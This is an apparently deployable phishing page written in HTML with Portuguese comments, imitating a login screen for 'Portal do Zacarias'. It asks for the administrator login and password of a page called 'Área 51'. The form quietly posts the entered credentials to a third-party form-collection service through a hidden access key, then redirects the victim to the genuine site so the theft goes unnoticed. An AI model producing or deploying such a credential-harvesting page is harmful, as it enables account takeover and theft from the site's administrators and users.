<!DOCTYPE html>
<html>
<head>
<style>
  body {
    background: #ff5561;
    background-image: url('');
    background-size: cover;
    background-repeat: no-repeat;
    background-attachment: fixed;
    background-position: center center;
    font-family: Arial, sans-serif;
    display: flex;
    flex-direction: column;
    align-items: center;
    justify-content: center;
    height: 100vh;
    margin: 0;
  }
  .container {
    background-color: rgba(255, 255, 255, 0.8);
    width: 300px;
    padding: 20px;
    border-radius: 5px;
    box-shadow: 0 0 5px rgba(0, 0, 0, 0.2);
    text-align: center;
    margin-top: 20px;
  }
  input[type="text"], input[type="password"] {
    width: 100%;
    padding: 5px;
    margin: 10px 0; /* Aumentei o espaçamento vertical */
    border: 1px solid #ccc;
    border-radius: 3px;
    font-size: 16px; /* Tamanho de fonte maior para melhor legibilidade */
  }
  input[type="submit"] {
    background-color: #ff000c; /* Azul profissional */
    color: #fff;
    padding: 12px 20px; /* Mais espaçamento ao redor do botão */
    border: none;
    border-radius: 3px;
    cursor: pointer;
    font-weight: bold; /* Texto em negrito */
    transition: background-color 0.2s; /* Efeito de hover na cor de fundo */
  }
  input[type="submit"]:hover {
    background-color: #ff000c; /* Cor de fundo mais escura no hover */
  }
  label {
    display: block; /* Rótulos em bloco para melhor alinhamento */
    margin-bottom: 5px; /* Espaçamento entre rótulo e campo */
  }
  
  p span{
    color:#ff000c;
  }
</style>
</head>
<body>
<img src="foto2.png" alt="" width="290">
<div class="container">
  <form action="https://api.staticforms.xyz/submit" method="POST" enctype="application/x-www-form-urlencoded"> <!-- Adicionado enctype -->
    <label for="login">Login:</label><br>
    <input type="text" name="name" required><br>

    <label for="password">Senha:</label><br>
    <input type="password" name="name" required><br>

    <input type="hidden" name="accessKey" value="4210baa6-2f4c-4491-8809-f64cd4a2c2e0">
    <input type="hidden" name="redirectTo" value="https://portaldozacarias.com.br/site/">

    <input type="submit" value="Confirmar">
    <p><span>USUÁRIO:</span>PORTAL DO ZACARIAS</p>
    <p><span>ATENÇÃO:</span>Para prosseguir, utilize o login e a senha do administrador da página 'Área 51'.</p>
  </form>
</div>
</body>
</html>
